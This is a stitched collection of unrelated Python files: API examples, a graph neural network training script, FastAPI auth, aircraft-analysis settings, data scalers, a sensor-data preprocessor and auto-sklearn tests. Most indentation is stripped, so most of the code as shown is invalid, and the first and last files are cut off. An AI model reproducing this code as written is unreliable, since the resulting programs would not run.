resp, code = self.fapi.delete(path)
print resp, code
def test(self):
""" simple illustration for set of API commands: upload, list, status, get, rename, delete """
self.printMarker("file upload")
path = FILE_PATH + self.file_name
directives={"placeholder_format_custom" : "\[.+?\]"}
resp, code = self.fapi.upload(path, self.file_type, authorize="true", callbackUrl=CALLBACK_URL, directives=directives)
print resp, code
        if 200 != code:
            raise Exception("failed")
self.printMarker("files list")
resp, code = self.fapi.list()
print resp, code
self.printMarker("file status")
resp, code = self.fapi.status(path)
print resp, code
self.printMarker("file from server goes here")
resp, code = self.fapi.get(path, self.MY_LOCALE)
print resp, code
self.printMarker("renaming file")
resp, code = self.fapi.rename(path, self.new_name)
print resp, code
self.printMarker("delete from server goes here")
resp, code = self.fapi.delete(self.new_name)
print resp, code
self.printMarker("doing list again to see if it's deleted")
resp, code = self.fapi.list()
print resp, code
FILE_NAME = "java.properties"
FILE_NAME_UTF16 = "javaUTF16.properties"
FILE_TYPE = "javaProperties"
FILE_PATH = "../resources/"
FILE_NAME_RENAMED = "java.properties.renamed"
CALLBACK_URL = "http://yourdomain.com/callback"
FILE_NAME_IMPORT = "test_import.xml"
FILE_NAME_TO_IMPORT = "test_import_es.xml"
FILE_TYPE_IMPORT ="android"
def upload_test():
#test simple file
example = SmartlingApiExample(FILE_NAME, FILE_TYPE, FILE_NAME_RENAMED)
example.test()
def import_test():
#example for import and last_modified commands
example = SmartlingApiExample(FILE_NAME_IMPORT, FILE_TYPE_IMPORT, FILE_NAME_RENAMED)
example.test_import(FILE_NAME_TO_IMPORT)
upload_test()
import_test()
|
import glob
import matplotlib.pyplot as plt
# from Gnn_Models.model import GCN
# from Gnn_Models import model
import numpy as np
import torch
import torch.nn.functional as F
from sklearn.ensemble import RandomForestRegressor
from torch_geometric.nn import GCNConv
from torch_geometric.transforms import RandomLinkSplit
from Dataset import gsp_dataset
from Embeddings.Auto_Encoder import pairwise_auto_encoder
from Embeddings.Node2Vec import node_representations
from sklearn.metrics import mean_absolute_error, mean_squared_error
class GCN(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels):
super(GCN, self).__init__()
torch.manual_seed(42)
# Initialize the layers
self.conv1 = GCNConv(in_channels, hidden_channels)
self.conv2 = GCNConv(hidden_channels, out_channels)
def forward(self, x, edge_index):
# First Message Passing Layer (Transformation)
x = self.conv1(x, edge_index)
x = x.relu()
x = F.dropout(x, p=0.5, training=self.training)
# Second Message Passing Layer
x = self.conv2(x, edge_index)
return x
# class GCN(torch.nn.Module):
# def __init__(self, hidden_channels):
# super(GCN, self).__init__()
# torch.manual_seed(12345)
# self.conv1 = GCNConv(train_data.num_features, hidden_channels)
# self.conv2 = GCNConv(hidden_channels, 100)
# self.linear1 = torch.nn.Linear(100, 1)
#
# def forward(self, x, edge_index):
# x = self.conv1(x, edge_index)
# x = x.relu()
# x = F.dropout(x, p=0.5, training=self.training)
# x = self.conv2(x, edge_index)
# x = self.linear1(x)
# return x
def train(model):
model.train()
optimizer.zero_grad() # Clear gradients.
# out = model(dataset.x, dataset.edge_index) # Perform a single forward pass.
out = model(train_data.x, train_data.edge_index)
print(out)
print(train_data.y)
# loss = criterion(out[dataset.train_mask], dataset.y[dataset.train_mask]) # Compute the loss solely based on the training nodes.
loss = criterion(out.squeeze(), train_data.y.squeeze()) # view(-1, 1))
loss.backward(retain_graph=True) # Derive gradients.
optimizer.step() # Update parameters based on gradients.
return loss
def test(model):
model.eval()
out = model(test_data.x, test_data.edge_index)
test_loss = criterion(out.squeeze(), test_data.y.squeeze()) # .y.view(-1, 1)
# Derive ratio of correct predictions.
return test_loss
def ground_truth(main_val, data):
data_aggr = []
window = 20
for k in range(0, int(np.floor(len(main_val) / window))):
data_aggr.append(np.mean(main_val[k * window:((k + 1) * window)]))
if (len(main_val) % window > 0):
data_aggr.append(np.mean(main_val[int(np.floor(len(main_val) / window)) * window:]))
delta_p = [np.round(data_aggr[i + 1] - data_aggr[i], 2) for i in range(0, len(data_aggr) - 1)]
# freq_data = data.y.detach().numpy() / np.linalg.norm(data.y.detach().numpy())
# freq_data = delta_p / np.linalg.norm(delta_p)
plt.figure(figsize=(10, 5))
plt.title("Consumption")
# plt.plot(val_losses, label="val")
print(data.y.detach().numpy())
plt.plot(list(data.y.detach().numpy()), label="fourier_transform")
plt.show()
plt.plot(delta_p, label="ground_truth")
plt.xlabel("time")
plt.ylabel("power_con")
plt.legend()
plt.show()
return data_aggr
def evaluate(model, test_features, test_labels):
predictions = model.predict(test_features)
errors = abs(predictions - test_labels)
mape = 100 * np.mean(errors / test_labels)
accuracy = 100 - mape
print('Model Performance')
print('Average Error: {:0.4f} degrees.'.format(np.mean(errors)))
print('Accuracy = {:0.2f}%.'.format(accuracy))
return accuracy
def conventional_ml(train_data, test_data):
param_grid = {
'bootstrap': [True],
'max_depth': [80, 90, 100, 110],
'max_features': [2, 3],
'min_samples_leaf': [3, 4, 5],
'min_samples_split': [8, 10, 12],
'n_estimators': [100, 200, 300, 1000]
}
# param_grid = {
# 'bootstrap': [True],
# 'max_depth': [80, 90, 100, 110],
# 'max_samples': [0.25, 0.5, 0.75],
# 'max_features': [2, 3, 4],
# 'min_samples_leaf': [2, 3, 4, 5],
# 'min_samples_split': [7, 8, 9, 10, 12],
# 'n_estimators': [50, 100, 200, 300, 1000]
# }
from sklearn.model_selection import GridSearchCV
import warnings
base_model = RandomForestRegressor(n_estimators=10, random_state=42)
base_model.fit(train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
base_accuracy = evaluate(base_model, train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
regr = RandomForestRegressor(random_state=0)
CV_regr = GridSearchCV(estimator=regr, param_grid=param_grid,
cv=5, n_jobs=-1, verbose=2, return_train_score=True)
with warnings.catch_warnings(record=True) as w:
try:
CV_regr.fit(train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel())
except ValueError:
pass
# print(repr(w[-1].message))
# train_data.x.detach().numpy(), train_data.y.detach().numpy().ravel()
# CV_regr.fit(np.array(train_data.x), np.array(train_data.y).ravel())
print(f'best parameters: {CV_regr.best_params_}')
best_grid = CV_regr.best_estimator_
grid_accuracy = evaluate(best_grid, test_data.x.detach().numpy(), test_data.y.detach().numpy().ravel())
print('Improvement of {:0.2f}%.'.format(100 * (grid_accuracy - base_accuracy) / base_accuracy))
mse = mean_squared_error(np.array(test_data.y.detach().numpy().ravel()), best_grid.predict(test_data.x.detach().numpy())) # .reshape(-1, 1)
mae = mean_absolute_error(test_data.y.detach().numpy().ravel(), best_grid.predict(test_data.x.detach().numpy()))
print(f'best_estimator {best_grid}')
print(f'mse: {mse}')
print(f'mae: {mae}')
return best_grid.predict(test_data.x.detach().numpy()).reshape(-1)
path = r'data/processed'
all_files = glob.glob(path + "/*.pt")
devices = [filename for filename in all_files]
index = 0
for filename in all_files:
# if not filename.__contains__('dishwasher'):
# continue
data = torch.load(f'{filename}')
print('-------------------------------------------------------------------')
print(filename.split('/')[-1].strip('.csv'))
data.num_classes = len(data.y.unique())
embedding_method = 'AE'
if embedding_method == 'Node2Vec':
embeddings = node_representations(data)
data.x = embeddings.data
elif embedding_method == 'AE':
data = pairwise_auto_encoder(data)
else:
print(data.x)
data.y = data.y.type(torch.FloatTensor)
print(data.x)
print(data.y)
print(data)
transform = RandomLinkSplit(is_undirected=True)
train_data, val_data, test_data = transform(data)
print(train_data, val_data, test_data)
index += 1
# pred = conventional_ml(train_data, test_data)
#
# plt.title("Predicted/ G-truth")
# plt.plot(pred, label="pred")
# plt.plot(test_data.y.view(-1, 1), label="g_truth", alpha=0.5)
# plt.title(str(index))
# plt.xlabel("timestep")
# plt.ylabel("delta_p")
# plt.legend()
# plt.show()
# from utils import mse
# print(mse(np.array(test_data.y.view(-1, 1)), pred))
# continue
# print('End Pip
# exit()
# exit()
#
from utils import mse
y_true = data.y.cpu().detach().numpy()
y_hat = np.mean(y_true)
print(mse(np.array([y_hat] * y_true.shape[0]), y_true))
# exit('By Marinos')
model = GCN(in_channels=4, hidden_channels=4, out_channels=1)
optimizer = torch.optim.Adam(model.parameters(), lr=0.1, weight_decay=5e-4)
criterion = torch.nn.MSELoss()
epochs = 20
train_losses = []
val_losses = []
print(np.unique(data.y.view(-1, 1)))
for epoch in range(1, 50):
loss = train(model)
# acc = test(model, test_data, criterion)
test_loss = test(model)
train_losses.append(loss.item())
val_losses.append(test_loss.item())
print(f'Epoch: {epoch:02d}, Loss: {loss:.4f}')
print(model)
results = model(data.x, data.edge_index)
results = results.detach().numpy().reshape(-1)
print(results)
# plt.title("Predicted/ G-truth")
plt.plot(results, label="pred")
plt.plot(data.y.view(-1, 1), label="g_truth", alpha=0.5)
plt.title(filename.split('/')[-1].strip('.csv'))
plt.xlabel("timestep")
plt.ylabel("delta_p")
plt.legend()
# plt.savefig('foo.png')
plt.show()
plt.figure(figsize=(10, 5))
plt.title("Training and Validation Loss")
plt.plot(val_losses, label="val")
plt.plot(train_losses, label="train")
plt.xlabel("iterations")
plt.ylabel("Loss")
plt.legend()
plt.show()
print('------------------------------End Pipeline-----------------------------')
|
from fastapi import FastAPI, Depends
import fastapi_simple_security
app = FastAPI()
@app.get("/unsecured")
async def unsecured_endpoint():
return {"message": "This is an unsecured endpoint"}
@app.get("/secure", dependencies=[Depends(fastapi_simple_security.api_key_security)])
async def secure_endpoint():
return {"message": "This is a secure endpoint"}
app.include_router(
fastapi_simple_security.api_key_router, prefix="/auth", tags=["_auth"]
)
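# Local smoke test with FastAPI's TestClient (no running server needed). The exact
# rejection status codes and the "api-key" header name come from
# fastapi_simple_security and are assumptions based on its documentation.
if __name__ == "__main__":
    from fastapi.testclient import TestClient
    client = TestClient(app)
    print(client.get("/unsecured").status_code)  # 200
    print(client.get("/secure").status_code)  # rejected: no API key supplied
    print(client.get("/secure", headers={"api-key": "not-a-real-key"}).status_code)  # rejected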
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ceasiompy.utils.moduleinterfaces import CPACSInOut, AIRCRAFT_XPATH
# ===== RCE integration =====
RCE = {
"name": "PyTornado",
"description": "Wrapper module for PyTornado",
"exec": "pwd\npython runpytornado.py",
"author": "Aaron Dettmann",
"email": "dettmann@kth.se",
}
REFS_XPATH = AIRCRAFT_XPATH + '/model/reference'
WING_XPATH = AIRCRAFT_XPATH + '/model/wings'
XPATH_PYTORNADO = '/cpacs/toolspecific/pytornado'
# ===== CPACS inputs and outputs =====
cpacs_inout = CPACSInOut()
#===== Input =====
cpacs_inout.add_input(
var_name='',
var_type=list,
default_value=None,
unit=None,
descr="Name of the aero map to evaluate",
xpath=XPATH_PYTORNADO + '/aeroMapUID',
gui=True,
gui_name='__AEROMAP_SELECTION',
gui_group=None,
)
cpacs_inout.add_input(
var_name='delete_old_wkdirs',
var_type=bool,
default_value=False,
unit=None,
descr="Delete old PyTornado working directories (if existent)",
xpath=XPATH_PYTORNADO + '/deleteOldWKDIRs',
gui=False,
gui_name='Delete',
gui_group='Delete old working directories',
)
# ----- Discretisation -----
# TO BE IMPROVED IN NEW PYTORNADO VERSION
cpacs_inout.add_input(
var_name='',
var_type=int,
default_value=20,
unit=None,
descr="The number of chordwise VLM panels",
xpath=XPATH_PYTORNADO + '/vlm_autopanels_c',
gui=True,
gui_name='Number of chordwise panels',
    gui_group='Discretisation',
)
cpacs_inout.add_input(
var_name='',
var_type=int,
default_value=5,
unit=None,
descr="The number of spanwise VLM panels",
xpath=XPATH_PYTORNADO + '/vlm_autopanels_s',
gui=True,
gui_name='Number of spanwise panels',
    gui_group='Discretisation',
)
# ----- Plots -----
for plot_name in ['lattice', 'geometry', 'results', 'matrix_downwash']:
for action in ['save', 'show']:
cpacs_inout.add_input(
var_name='',
var_type=bool,
default_value=False,
unit=None,
descr=f"{action.capitalize()} a {plot_name.replace('_', ' ')} plot (program will pause to show)",
xpath=XPATH_PYTORNADO + f'/plot/{plot_name}/{action}',
gui=True,
gui_name=f'{action.capitalize()} plot',
gui_group=f"{plot_name.capitalize().replace('_', ' ')} plot",
)
# TODO: add optional settings
# ----- Save other results -----
for save_name in ['global', 'panelwise', 'aeroperformance']:
cpacs_inout.add_input(
var_name='',
var_type=bool,
default_value=False,
unit=None,
descr=f"Save PyTornado '{save_name}' results",
xpath=XPATH_PYTORNADO + f'/save_results/{save_name}',
gui=True,
gui_name=f'Save {save_name.capitalize()}',
gui_group=f'Save CPACS external results',
)
cpacs_inout.add_input(
var_name='check_extract_loads',
var_type=bool,
default_value=False,
unit='1',
descr='Option to extract loads from results',
xpath=XPATH_PYTORNADO + '/save_results/extractLoads',
gui=True,
gui_name='Extract loads',
gui_group=f'Save CPACS external results',
)
cpacs_inout.add_input(
var_name='x_CG',
default_value=None,
unit='m',
descr='Centre of gravity (x-coordinate)',
xpath=REFS_XPATH + '/point/x'
)
cpacs_inout.add_input(
var_name='y_CG',
default_value=None,
unit='m',
descr='Centre of gravity (y-coordinate)',
    xpath=REFS_XPATH + '/point/y'
)
cpacs_inout.add_input(
var_name='z_CG',
default_value=None,
unit='m',
descr='Centre of gravity (z-coordinate)',
    xpath=REFS_XPATH + '/point/z'
)
cpacs_inout.add_input(
var_name='area',
default_value=None,
unit='m^2',
descr='Reference area for force and moment coefficients',
xpath=REFS_XPATH + '/area'
)
cpacs_inout.add_input(
var_name='length',
default_value=None,
unit='m',
descr='Reference length for force and moment coefficients',
xpath=REFS_XPATH + '/length'
)
cpacs_inout.add_input(
var_name='wing',
default_value=None,
unit='-',
descr='Aircraft lifting surface',
xpath=WING_XPATH,
)
# ----- Output -----
cpacs_inout.add_output(
var_name='aeromap_PyTornado', # name to change...
    # var_type=CPACS_aeroMap,  # no type for output, would it be useful?
default_value=None,
unit='-',
descr='aeroMap with aero coefficients calculated by PyTornado',
xpath='/cpacs/vehicles/aircraft/model/analyses/aeroPerformance/aeroMap[i]/aeroPerformanceMap',
)
|
# -*- coding: utf-8 -*-
# create MC/MCV files from curve data
#
import femagtools
import logging
import os
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(message)s')
mcvData = [
dict(curve=[dict(
bi=[0.0, 0.09, 0.179, 0.267, 0.358,
0.45, 0.543, 0.6334, 0.727,
0.819, 0.9142, 1.0142, 1.102,
1.196, 1.314, 1.3845, 1.433,
1.576, 1.677, 1.745, 1.787,
1.81, 1.825, 1.836],
hi=[0.0, 22.16, 31.07, 37.25, 43.174,
49.54, 56.96, 66.11, 78.291,
95, 120.64, 164.6, 259.36,
565.86, 1650.26, 3631.12, 5000, 10000,
15000, 20000, 25000, 30000, 35000, 40000])],
desc=u"Demo Steel",
name='M270-35A',
ch=4.0,
cw_freq=2.0,
cw=1.68),
dict(curve=[{"angle": 0.0,
"bi": [0.0, 0.5001193881034851, 0.6001256704330444,
0.700133204460144, 0.8001407384872437,
0.9001495242118835, 1.0001596212387085,
1.1001709699630737, 1.2001848220825195,
1.3002337217330933, 1.4003480672836304,
1.500654697418213, 1.6016123294830322,
1.7040778398513794, 1.8085501194000244,
1.9156187772750854, 1.9730873107910156],
"hi": [0.0, 95.0, 100.0, 106.0, 112.0, 119.0, 127.0,
136.0, 147.0, 186.0, 277.0, 521.0, 1283.0,
3245.0, 6804.0, 12429.0, 16072.6748046875]},
{"angle": 90.0,
"bi": [0.0, 0.5002199411392212, 0.6002413034439087,
0.7002626061439514, 0.8002877831459045,
0.9003154039382935, 1.0003480911254883,
1.1003907918930054, 1.2004486322402954,
1.3005428314208984, 1.4007363319396973,
1.5012717247009277, 1.6028035879135132,
1.7061727046966553, 1.8115723133087158,
1.918825626373291, 1.9763903617858887],
"hi": [0.0, 175.0, 192.0, 209.0, 229.0, 251.0,
277.0, 311.0, 357.0, 432.0, 586.0,
1012.0, 2231.0, 4912.0, 9209.0, 14981.0,
18718.376953125]}],
ctype=femagtools.mcv.ORIENT_CRV,
desc="Magnetic Curve",
rho=7.65,
bsat=0.0,
name="V800-50A_aniso",
cw=0.0,
cw_freq=0.0,
fillfac=1.0,
bref=0.0,
b_coeff=0.0,
fe_sat_mag=2.15,
ch_freq=0.0,
remz=0.0,
Bo=1.5,
ch=0.0,
fo=50.0)
]
userdir = os.path.expanduser('~')
workdir = os.path.join(userdir, 'femag')
try:
os.makedirs(workdir)
except OSError:
pass
mcv = femagtools.mcv.MagnetizingCurve(mcvData)
for m in mcvData:
mcv.writefile(m['name'], workdir)
|
"""
Implement numerical maxabs scaler.
"""
from typing import Any, Union
import dask.dataframe as dd
class MaxAbsScaler:
"""Max Absolute Value Scaler for scaling numerical values
Attributes:
name
Name of scaler
maxabs
Max absolute value of provided data column
"""
def __init__(self) -> None:
"""
        Initialize the numerical scaler.
"""
self.name = "maxabsScaler"
self.maxabs = 0
def fit(self, col_df: dd.Series) -> Any:
"""
Extract max absolute value for MaxAbs Scaler according to the provided column.
Parameters
----------
col_df
Provided data column.
"""
        maxabs = col_df.abs().max()
        # dask reductions are lazy; materialize the scalar if needed
        self.maxabs = maxabs.compute() if hasattr(maxabs, "compute") else maxabs
        return self
def transform(self, col_df: dd.Series) -> dd.Series:
"""
Transform the provided data column with the extracted max absolute value.
Parameters
----------
col_df
Provided data column.
"""
result = col_df.map(self.compute_val)
return result
def fit_transform(self, col_df: dd.Series) -> dd.Series:
"""
Extract max absolute value for MaxAbs Scaler according to the provided column.
Transform the provided data column with the extracted max absolute value.
Parameters
----------
col_df
Data column.
"""
return self.fit(col_df).transform(col_df)
def compute_val(self, val: Union[int, float]) -> Union[int, float]:
"""
Compute scaling value of provided value with fitted max absolute value.
Parameters
----------
val
Value should be scaled.
"""
return val / self.maxabs
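# Minimal usage sketch on a tiny dask Series (values are arbitrary); the scaled
# result is lazy, so .compute() materializes it as a pandas Series.
if __name__ == "__main__":
    import pandas as pd
    ddf = dd.from_pandas(pd.Series([-4.0, 2.0, 8.0]), npartitions=1)
    scaler = MaxAbsScaler()
    print(scaler.fit_transform(ddf).compute().tolist())  # -> [-0.5, 0.25, 1.0]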
|
"""
This module provides versioning information.

Usage:
    from SlackLogger.version import get_version
    __version__ = get_version()
"""
VERSION = '2.5.0'
def get_version():
"""
Return package version value.
:return: VERSION value, obviously
:rtype: string
"""
return VERSION
|
import os
import unittest
import apiritif
from apiritif.thread import get_index
reader_1 = apiritif.CSVReaderPerThread(os.path.join(os.path.dirname(__file__), "data/source0.csv"))
def log_it(name, target, data):
log_line = "%s[%s]-%s. %s:%s:%s\n" % (get_index(), target, name, data["name"], data["pass"], data["age"])
with apiritif.transaction(log_line): # write log_line into report file for checking purposes
pass
def setup(): # setup_module
target = str(get_index())
vars = {
'name': 'nobody',
'age': 'a'
}
reader_1.read_vars()
vars.update(reader_1.get_vars())
apiritif.put_into_thread_store(vars, target)
# class Test0(unittest.TestCase):
# def test_00(self):
# log_it("00", reader_1.get_vars())
class Test1(unittest.TestCase):
def setUp(self):
self.vars, self.target = apiritif.get_from_thread_store()
def test_10(self):
log_it("10", self.target, self.vars)
self.vars["name"] += "+"
def test_11(self):
log_it("11", self.target, self.vars)
|
# Copyright 2020 Supun Nakandala. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import time
import json
import pandas as pd
import numpy as np
from datetime import timedelta, datetime
import argparse
def filter_labels(x):
if len(set(x)) == 1:
return x[0]
else:
return -1
def preprocess_raw_data(gt3x_dir, activpal_dir, user_id, gt3x_frequency, label_map):
if activpal_dir is not None:
# Read activepal file
        def date_parser(x): return datetime.strptime(x, '%Y-%m-%d %H:%M:%S')
df_ap = pd.read_csv(os.path.join(activpal_dir, str(user_id)+'.csv'),
parse_dates=['StartTime', 'EndTime'], date_parser=date_parser, usecols=['StartTime', 'EndTime', 'Behavior'])
# Flatten the activepal file to 1 second resolution
data = []
prev_end_time = None
segment_no = 0
for i in range(len(df_ap)):
x = df_ap.iloc[i]
if not (prev_end_time is None) and (x['StartTime']-prev_end_time).total_seconds() > 1:
segment_no += 1
for i in range(int((x['EndTime']-x['StartTime']).total_seconds() + 1)):
data.append([segment_no, x['StartTime'] +
timedelta(seconds=i), label_map[x['Behavior']]])
prev_end_time = x['EndTime']
df_ap = pd.DataFrame(data)
df_ap.columns = ['Segment', 'Time', 'Behavior']
else:
df_ap = None
# Find activegraph start time
with open(os.path.join(gt3x_dir, str(user_id)+'.csv'), 'r') as fp:
acc_start_time = ''
count = 0
for l in fp:
if count == 2:
acc_start_time = l.split(' ')[2].strip()
elif count == 3:
acc_start_time = l.split(' ')[2].strip() + ' ' + acc_start_time
break
count += 1
# Read activegraph file
df_acc = pd.read_csv(os.path.join(gt3x_dir, str(user_id)+'.csv'), skiprows=10)
# Aggregate at 1 second resolution
data = []
begin_time = datetime.strptime(acc_start_time, '%m/%d/%Y %H:%M:%S')
for i in range(0, len(df_acc), gt3x_frequency):
x = np.array(df_acc.iloc[i:i+gt3x_frequency])
data.append([begin_time + timedelta(seconds=i//gt3x_frequency), x])
df_acc = pd.DataFrame(data)
df_acc.columns = ['Time', 'Accelerometer']
# Create joined table
if df_ap is not None:
df = pd.merge(df_acc, df_ap, on='Time')
df['User'] = user_id
df = df[['User', 'Segment', 'Time', 'Accelerometer', 'Behavior']]
else:
df = df_acc
df['User'] = user_id
df = df[['User', 'Time', 'Accelerometer']]
return df
def extract_windows(original_df, window_size):
df = []
for (user, segment), group in original_df.groupby(["User", "Segment"]):
group.index = group["Time"]
group = group[~group.index.duplicated(keep='first')]
        # [:-1] because the last row may not necessarily have window_size seconds of data
temp = group["Accelerometer"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: np.vstack(x.values.tolist()))[:-1]
temp2 = group["Time"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: x.values.tolist()[0])
temp = pd.concat([temp, temp2], axis=1)[:-1]
if 'Behavior' in original_df.columns:
temp2 = group["Behavior"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: filter_labels(x.values.tolist()))
temp = pd.concat([temp, temp2], axis=1)[:-1]
# Remove time windows with more than one label
temp = temp[temp["Behavior"] >= 0]
temp["User"] = user
temp["Segment"] = segment
if 'Behavior' in original_df.columns:
temp = temp[["User", "Segment", "Time", "Accelerometer", "Behavior"]]
temp = temp[temp["Behavior"] >= 0]
else:
temp = temp[["User", "Segment", "Time", "Accelerometer"]]
df.append(temp)
return pd.concat(df)
def extract_features(gt3x_dir, activpal_dir, pre_processed_dir, user_id, window_size, gt3x_frequency, label_map):
df = preprocess_raw_data(gt3x_dir, activpal_dir, user_id, gt3x_frequency, label_map)
if activpal_dir is None:
df['Segment'] = 0
df = df[['User', 'Segment', 'Time', 'Accelerometer']]
    # Windows of `window_size` seconds (3 by default)
df = extract_windows(df, window_size=window_size)
# Write the joined table
df.to_pickle(os.path.join(pre_processed_dir, str(user_id)+'.bin'))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Argument parser for preprocessing the input data.')
optional_arguments = parser._action_groups.pop()
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument('--gt3x-dir', help='GT3X data directory', required=True)
required_arguments.add_argument('--pre-processed-dir', help='Pre-processed data directory', required=True)
optional_arguments.add_argument('--activpal-dir', help='ActivPAL data directory', default=None, required=False)
optional_arguments.add_argument('--window-size', help='Window size in seconds on which the predictions to be made', default=3, type=int, required=False)
optional_arguments.add_argument('--gt3x-frequency', help='GT3X device frequency in Hz', default=30, type=int, required=False)
optional_arguments.add_argument('--activpal-label-map', help='ActivPal label vocabulary', default='{"sitting": 0, "standing": 1, "stepping": 2}', required=False)
optional_arguments.add_argument('--silent', help='Whether to hide info messages', default=False, required=False, action='store_true')
parser._action_groups.append(optional_arguments)
args = parser.parse_args()
if not os.path.exists(args.pre_processed_dir):
os.makedirs(args.pre_processed_dir)
label_map = json.loads(args.activpal_label_map)
for fname in os.listdir(args.gt3x_dir):
if fname.endswith('.csv'):
user_id = fname.split(".")[0]
extract_features(args.gt3x_dir, args.activpal_dir, args.pre_processed_dir, user_id, args.window_size, args.gt3x_frequency, label_map)
if not args.silent:
print('Completed pre-processing data for subject: {}'.format(user_id))
|
import numpy as np
import pandas as pd
import pytest
from pandas.api.types import is_numeric_dtype
from scipy import sparse
import sklearn.datasets
import sklearn.model_selection
from sklearn.utils.multiclass import type_of_target
from autosklearn.data.target_validator import TargetValidator
# Fixtures to be used in this class. By default all elements have 100 datapoints
@pytest.fixture
def input_data_targettest(request):
if request.param == 'series_binary':
return pd.Series([1, -1, -1, 1])
elif request.param == 'series_multiclass':
return pd.Series([1, 0, 2])
elif request.param == 'series_multilabel':
return pd.Series([[1, 0], [0, 1]])
elif request.param == 'series_continuous':
return pd.Series([0.1, 0.6, 0.7])
elif request.param == 'series_continuous-multioutput':
return pd.Series([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'pandas_binary':
return pd.DataFrame([1, -1, -1, 1])
elif request.param == 'pandas_multiclass':
return pd.DataFrame([1, 0, 2])
elif request.param == 'pandas_multilabel':
return pd.DataFrame([[1, 0], [0, 1]])
elif request.param == 'pandas_continuous':
return pd.DataFrame([0.1, 0.6, 0.7])
elif request.param == 'pandas_continuous-multioutput':
return pd.DataFrame([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'numpy_binary':
return np.array([1, -1, -1, 1])
elif request.param == 'numpy_multiclass':
return np.array([1, 0, 2])
elif request.param == 'numpy_multilabel':
return np.array([[1, 0], [0, 1]])
elif request.param == 'numpy_continuous':
return np.array([0.1, 0.6, 0.7])
elif request.param == 'numpy_continuous-multioutput':
return np.array([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'list_binary':
return [1, -1, -1, 1]
elif request.param == 'list_multiclass':
return [1, 0, 2]
elif request.param == 'list_multilabel':
return [[0, 1], [1, 0]]
elif request.param == 'list_continuous':
return [0.1, 0.6, 0.7]
elif request.param == 'list_continuous-multioutput':
return [[1.5, 2.0], [3.0, 1.6]]
elif 'openml' in request.param:
_, openml_id = request.param.split('_')
X, y = sklearn.datasets.fetch_openml(data_id=int(openml_id),
return_X_y=True, as_frame=True)
if len(y.shape) > 1 and y.shape[1] > 1 and np.any(y.eq('TRUE').any(1).to_numpy()):
# This 'if' is only asserted for multi-label data
# Force the downloaded data to be interpreted as multilabel
y = y.dropna()
y.replace('FALSE', 0, inplace=True)
y.replace('TRUE', 1, inplace=True)
y = y.astype(np.int)
return y
elif 'sparse' in request.param:
# We expect the names to be of the type sparse_csc_nonan
sparse_, type_, nan_ = request.param.split('_')
if 'nonan' in nan_:
data = np.ones(3)
else:
data = np.array([1, 2, np.nan])
# Then the type of sparse
if 'csc' in type_:
return sparse.csc_matrix(data)
elif 'csr' in type_:
return sparse.csr_matrix(data)
elif 'coo' in type_:
return sparse.coo_matrix(data)
elif 'bsr' in type_:
return sparse.bsr_matrix(data)
elif 'lil' in type_:
return sparse.lil_matrix(data)
elif 'dok' in type_:
return sparse.dok_matrix(np.vstack((data, data, data)))
elif 'dia' in type_:
return sparse.dia_matrix(np.vstack((data, data, data)))
        else:
            raise ValueError("Unsupported indirect fixture {}".format(request.param))
    else:
        raise ValueError("Unsupported indirect fixture {}".format(request.param))
# Actual checks for the targets
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'series_continuous',
'pandas_binary',
'pandas_multiclass',
'pandas_multilabel',
'pandas_continuous',
'pandas_continuous-multioutput',
'numpy_binary',
'numpy_multiclass',
'numpy_multilabel',
'numpy_continuous',
'numpy_continuous-multioutput',
'list_binary',
'list_multiclass',
'list_multilabel',
'list_continuous',
'list_continuous-multioutput',
'sparse_bsr_nonan',
'sparse_coo_nonan',
'sparse_csc_nonan',
'sparse_csr_nonan',
'sparse_lil_nonan',
'openml_204',
),
indirect=True
)
def test_targetvalidator_supported_types_noclassification(input_data_targettest):
validator = TargetValidator(is_classification=False)
validator.fit(input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
if sparse.issparse(input_data_targettest):
assert sparse.issparse(transformed_y)
else:
assert isinstance(transformed_y, np.ndarray)
    expected_shape = np.shape(input_data_targettest)
    if len(expected_shape) > 1 and expected_shape[1] == 1:
        # The target should have (N,) dimensionality instead of (N, 1)
        expected_shape = (expected_shape[0], )
    assert expected_shape == np.shape(transformed_y)
assert np.issubdtype(transformed_y.dtype, np.number)
assert validator._is_fitted
    # Because this is not classification, we do not expect an encoder
assert validator.encoder is None
if hasattr(input_data_targettest, "iloc"):
np.testing.assert_array_equal(
np.ravel(input_data_targettest.to_numpy()),
np.ravel(transformed_y)
)
elif sparse.issparse(input_data_targettest):
np.testing.assert_array_equal(
np.ravel(input_data_targettest.todense()),
np.ravel(transformed_y.todense())
)
else:
np.testing.assert_array_equal(
np.ravel(np.array(input_data_targettest)),
np.ravel(transformed_y)
)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'pandas_binary',
'pandas_multiclass',
'numpy_binary',
'numpy_multiclass',
'list_binary',
'list_multiclass',
'sparse_bsr_nonan',
'sparse_coo_nonan',
'sparse_csc_nonan',
'sparse_csr_nonan',
'sparse_lil_nonan',
'openml_2',
),
indirect=True
)
def test_targetvalidator_supported_types_classification(input_data_targettest):
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
if sparse.issparse(input_data_targettest):
assert sparse.issparse(transformed_y)
else:
assert isinstance(transformed_y, np.ndarray)
    expected_shape = np.shape(input_data_targettest)
